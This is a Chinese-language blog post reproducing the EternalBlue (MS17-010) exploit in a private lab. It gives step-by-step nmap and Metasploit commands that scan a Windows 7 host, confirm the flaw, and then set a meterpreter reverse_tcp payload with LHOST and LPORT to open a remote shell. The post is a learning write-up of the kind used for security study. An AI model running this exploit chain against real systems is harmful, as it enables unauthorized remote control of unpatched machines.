永恒之蓝本地复现

在某一次会议上发现我并不会永恒之蓝,所以,嗯,我来了。

复现环境

kali:192.168.233.145
win7:192.168.233.146

信息搜集

nmap扫端口

nmap -Pn 192.168.233.146

image.png

看到开放了445端口,而永恒之蓝(ms17-010)利用的就是445端口的smb服务。

syn扫描模块

除了nmap还可以直接用msf自带的syn扫描模块

set rhosts 192.168.233.146 设置远端主机
set ports 0-500 设置端口范围
set threads 20 设置线程
run 执行

我这里报错了,但命令是没问题的


image.png

后来查了一下用sudo 起msfconsole就好了 这次的端口范围是0-1000(真的很慢就是了,20线程还慢成这样子,还是nmap好用)


image.png

进入msf框架

msfconsole
search ms 17-010

image.png

搜出不少东西,大体分为两部分,auxiliary(辅助)模块和exploit(攻击)模块。auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞。
exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

扫描是否存在ms 17-010

use auxiliary/scanner/smb/smb_ms17_010
然后看看必要的options
show options

image.png

右边yes的就是必要选项
RHOSTS 参数是要探测主机的ip或ip范围
set RHOSTS 192.168.233.146
RPORT参数是该主机的端口
set RPORT 445
执行
run
image.png

看到探测说很可能能够会受到永恒之蓝漏洞的攻击。

攻击

首先攻击模块
use exploit/windows/smb/ms17_010_eternalblue
info命令查看这个漏洞的信息

image.png

show payloads
该命令可以查看当前漏洞利用模块下可用的所有Payload
image.png

设置攻击负载
set payload windows/x64/meterpreter/reverse_tcp
设置好rhosts(远端ip) 和lhost(本地ip)
image.png

命令详情:
—set payload windows/x64/meterpreter/reverse_tcp
(要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload)
—show options :使用该命令会列出使用当前模块所需配置的参数
—set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
—set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
—set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
—run:开始攻击

攻击成功后攻击机和目标主机之间会建立一个连接,得到一个meterpreter会话


image.png

第一个框说明可以利用
第二个框说明已经覆盖完成


image.png

这里看到靶机和攻击机建立了一个shell连接,会话为session 1
我们回到windows机器发现已经打黑屏了
image.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容